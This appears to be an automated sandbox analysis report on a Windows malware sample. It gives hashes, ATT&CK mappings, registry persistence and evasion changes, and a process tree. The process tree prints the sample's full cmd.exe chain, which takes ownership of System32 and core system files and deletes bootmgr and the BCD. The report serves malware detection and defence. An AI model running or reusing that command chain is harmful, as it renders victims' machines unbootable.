62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d

General

Target

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Size

167KB
MD5

e2dd51185d89bf02160ca232d2c9be77
SHA1

d562fc86c73c154030b7f7021ecc10c89312cc22
SHA256

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d
SHA512

6d2e3cfdecbd7cbce5258b312405ad53f6e0e4a0b2a2f1e98795063cf0718203494125d663e411742c0033a6e1cb580843a1ff1475e25ea82bd09a2a70deb340

Score

10^/10

discovery evasion exploit persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Disables RegEdit via registry modification
evasion
Disables Task Manager via registry modification
evasion
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

376 icacls.exe
3916 takeown.exe
720 icacls.exe
2540 takeown.exe
4632 icacls.exe
3804 takeown.exe
1672 icacls.exe
460 takeown.exe

pid	process
376	icacls.exe
3916	takeown.exe
720	icacls.exe
2540	takeown.exe
4632	icacls.exe
3804	takeown.exe
1672	icacls.exe
460	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

3916 takeown.exe
720 icacls.exe
2540 takeown.exe
4632 icacls.exe
3804 takeown.exe
1672 icacls.exe
460 takeown.exe
376 icacls.exe

pid	process
3916	takeown.exe
720	icacls.exe
2540	takeown.exe
4632	icacls.exe
3804	takeown.exe
1672	icacls.exe
460	takeown.exe
376	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Black_Mamba = "C:\\Users\\Admin\\AppData\\Local\\Temp\\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe"	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0"	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3304 taskkill.exe
4844 taskkill.exe

pid	process
3304	taskkill.exe
4844	taskkill.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exetaskkill.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1228	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Token: SeDebugPrivilege	1228	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Token: SeDebugPrivilege	3304	taskkill.exe
Token: SeTakeOwnershipPrivilege	460	takeown.exe
Token: SeTakeOwnershipPrivilege	3916	takeown.exe
Token: SeTakeOwnershipPrivilege	2540	takeown.exe
Token: SeTakeOwnershipPrivilege	3804	takeown.exe
Token: SeDebugPrivilege	4844	taskkill.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.execmd.exe

description	pid	process	target process
PID 1228 wrote to memory of 2520	1228	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe	cmd.exe
PID 1228 wrote to memory of 2520	1228	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe	cmd.exe
PID 2520 wrote to memory of 3304	2520	cmd.exe	taskkill.exe
PID 2520 wrote to memory of 3304	2520	cmd.exe	taskkill.exe
PID 2520 wrote to memory of 460	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 460	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 376	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 376	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 3916	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 3916	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 720	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 720	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 2540	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 2540	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 4632	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 4632	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 3804	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 3804	2520	cmd.exe	takeown.exe
PID 2520 wrote to memory of 1672	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 1672	2520	cmd.exe	icacls.exe
PID 2520 wrote to memory of 4844	2520	cmd.exe	taskkill.exe
PID 2520 wrote to memory of 4844	2520	cmd.exe	taskkill.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1"	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUA = "1"	62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe

C:\Users\Admin\AppData\Local\Temp\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe
"C:\Users\Admin\AppData\Local\Temp\62ba6f76a9dfa3cd19b768e435124b8217420d58efad6265ce20a443deb3619d.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && taskkill /f /im explorer.exe && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant %username%:F && takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant %username%:F && taskkill /f /im taskhost.exe && takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant %username%:F && takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant %username%:F && takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant %username%:F && takeown /f C:\Windows\Boot\PCAT\bootmgr && icacls C:\Windows\Boot\PCAT\bootmgr /grant %username%:F && del C:\Windows\Boot\PCAT\bootmgr && takeown /f C:\Windows\Boot\DVD\PCAT\BCD && icacls C:\Windows\Boot\DVD\PCAT\BCD /grant %username%:F && del C:\Windows\Boot\DVD\PCAT\BCD && takeown /f C:\Windows\explorer.exe && icacls C:\Windows\explorer.exe /grant %username%:F && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && Exit
2⤵
- Suspicious use of WriteProcessMemory
PID:2520

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:460

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:376

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:720

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.exe /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4632

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winlogon.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3804

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winlogon.exe /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1672

C:\Windows\system32\taskkill.exe
taskkill /f /im taskhost.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4844

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Winlogon Helper DLL

2

T1004

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

4

T1112

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/376-137-0x0000000000000000-mapping.dmp

Download
memory/460-136-0x0000000000000000-mapping.dmp

Download
memory/720-139-0x0000000000000000-mapping.dmp

Download
memory/1228-133-0x000000001BA22000-0x000000001BA24000-memory.dmp

Filesize
8KB

Download
memory/1228-132-0x000000001BA20000-0x000000001BA22000-memory.dmp

Filesize
8KB

Download
memory/1228-131-0x00007FFE82B80000-0x00007FFE83641000-memory.dmp

Filesize
10.8MB

Download
memory/1228-130-0x0000000000D10000-0x0000000000D40000-memory.dmp

Filesize
192KB

Download
memory/1672-143-0x0000000000000000-mapping.dmp

Download
memory/2520-134-0x0000000000000000-mapping.dmp

Download
memory/2540-140-0x0000000000000000-mapping.dmp

Download
memory/3304-135-0x0000000000000000-mapping.dmp

Download
memory/3804-142-0x0000000000000000-mapping.dmp

Download
memory/3916-138-0x0000000000000000-mapping.dmp

Download
memory/4632-141-0x0000000000000000-mapping.dmp

Download
memory/4844-144-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads